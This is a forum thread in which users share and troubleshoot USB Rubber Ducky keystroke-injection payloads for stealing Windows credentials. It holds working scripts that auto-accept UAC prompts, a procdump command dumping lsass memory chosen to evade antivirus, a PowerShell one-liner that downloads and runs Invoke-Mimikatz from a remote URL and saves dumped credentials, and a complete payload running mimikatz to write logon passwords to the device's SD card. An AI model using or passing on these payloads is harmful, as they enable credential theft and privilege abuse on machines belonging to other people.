gentilkiwi Posted August 25, 2014 Share Posted August 25, 2014 It seems you don't have UAC ;) otherwise ALT o will valid the UAC prompt ;) Quote Link to comment Share on other sites More sharing options...
zardoz Posted August 26, 2014 Share Posted August 26, 2014 (edited) indeed !! you are right ! on my sandbox machine, i don't have uac enable :D that's why .. so i erased these lines and the script worked perfeclty. BUT... if i use it with UAC enable, i have a problem. the order "ALT y" is working good manually , yes, but the problem is the UAC pop up is not automatically on front. sorry for my bad english. i mean, if i click on the UAC pop-up, and making myself ALT Y, ok , it's working. but i need to click on the pop-up. if not, it seems the cmd windows are in front.(i don't know the term in english) en francais: c'est comme si la fenetre de l'UAC n'etait pas selectionné automatiquement. du coup, ma commande ALT y ne sert a rien, vu qu'elle agi au niveau de la fenetre "cmd" :( so the order to say yes i want to authorize on UAC "ALT y" is not understood by the PC. am i the only one to have this problem ? is there a command line to select the UAC pop-up, before makiing the ALT y ? :) Edited August 26, 2014 by zardoz Quote Link to comment Share on other sites More sharing options...
gentilkiwi Posted August 26, 2014 Share Posted August 26, 2014 Heureusement je peux facilement te comprendre ;) Never seen that... but you can try to add : ALT-TAB DELAY 500 Before the ALT o / ALT y ;) Not focused or focused, it can't be so bad, no ? let me know ;) Quote Link to comment Share on other sites More sharing options...
zardoz Posted August 26, 2014 Share Posted August 26, 2014 (edited) ok, so i tried to add ADD TAB and ADD-TAB, but it doesnt worked. i try also SHIFT ALT TAB and SHIFT-ALT-TAB , but it seems these commands are not recognize by the Ducky. so i changed the way to acces to an admin cmd with the code of shutin: REM Bypass UAC DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 300 ENTER and it worked :) Edited August 28, 2014 by zardoz Quote Link to comment Share on other sites More sharing options...
zardoz Posted August 28, 2014 Share Posted August 28, 2014 ok, so i tried to add ADD TAB and ADD-TAB, but it doesnt worked. i try also SHIFT ALT TAB and SHIFT-ALT-TAB , but it seems these commands are not recognize by the Ducky. so i changed the way to acces to an admin cmd with the code of shutin: REM Bypass UAC DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 300 ENTER and it worked :) Quote Link to comment Share on other sites More sharing options...
zardoz Posted August 29, 2014 Share Posted August 29, 2014 I've been reading a tutorial about how you can just use the Sysinternals tool Procdump.exe to generate the dmp file like this: procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp The beauty here is that procdump will not get flagged by AV like minikatz already is (6/xx on virustotal already) because it's an official microsoft utility! All we need is to have the ducky run procman and put the file on the duck and then we can run minikatz on it later on our own pc. How come everyone always wants the duck to grab things from the internet? We have the capabilty to save files on the ducky so why not use that instead? any news of that ? it could be nice ! indeed, mimikatz is great, but it not survive when you plug the ducky on a random machine with AV. Quote Link to comment Share on other sites More sharing options...
gentilkiwi Posted August 29, 2014 Share Posted August 29, 2014 Of course it works too, but it's much slower ;) do your own mimikatz version ! (open source) Quote Link to comment Share on other sites More sharing options...
MB60893 Posted August 31, 2014 Share Posted August 31, 2014 I see one serious problem with these scripts, and that is you are effectively downloading Mimikatz to the target machine and executing it. Mimikatz is easily set off by an AV, such as Microsoft Security Essentials. I find that the best way of using Mimikatz is using this powershell script: powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" >> %USERPROFILE%\creds.txt This script checks for the correct architecture of the PC's system, then downloads the correct .dll file needed for the execution of Mimikatz. Much cleaner than having to download and store the Mimikatz .exe file. Quote Link to comment Share on other sites More sharing options...
BeNe Posted October 9, 2014 Share Posted October 9, 2014 This Powershell Script works perfect! But the most of the clients have a Proxy with authentication active. Is there a way to use the system default proxy settings to get the script running ? Or to put the powershell Script and needed dll to the SDCard ? Mimikatz_xy.exe is set off by the AV - the script not. Quote Link to comment Share on other sites More sharing options...
ElYpsilon Posted October 13, 2014 Share Posted October 13, 2014 Hi, the script dont work on my Ducky...i have flashed the twin ducky Firmware, rename the SD Card to "DUCKY" and copy the code into the decoder....everthing seems fine, but the payload does not run mimikatz...and dont save it to the passwort.txt file on the micro SD card. I use the German keyboard layout and my target machines are only WIN 7 64 bit. At the end of the script, the injected bin will opened by the editor, and then its finish. Sorry for my extremly bad english... I use this code: REM Author: Hak5Darren. Props: shutin, DyFukA, MubixREM Description: Dump local wdigest passwords from memory using mimikatzREM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mikikatz fromREM SD card labeled "DUCKY" and save log file as %computername%-passwords.txtREM Target: Windows 7 x64 (target win32 with 32-bit binary)REM *** UAC Bypass ***DELAY 2000WINDOWS rDELAY 200STRING powershell Start-Process cmd.exe -Verb runAsENTERDELAY 2000ALT yDREM *** Define DUCKY drive as %duck%STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%dENTERDELAY 500REM *** Execute mimikatz from SD card and save log file to disk ***STRING %duck%\mimikatz_alpha_x64.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txtENTERREM *** GTFO ***STRING exitENTERSTRING exitENTER To bypass the UAC in German keyboard layout, ALT y is also working like the UK layout? Quote Link to comment Share on other sites More sharing options...
ElYpsilon Posted October 13, 2014 Share Posted October 13, 2014 Hey...me again...i resolve the problem... i replaced ALT y with TAB TAB TAB...now it works.. ;-) Quote Link to comment Share on other sites More sharing options...
BeNe Posted October 14, 2014 Share Posted October 14, 2014 If you use a German Keyboard Layout then you should use "ALT j" (j = ja) Quote Link to comment Share on other sites More sharing options...
ElYpsilon Posted October 14, 2014 Share Posted October 14, 2014 Yeah you`re right...works! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.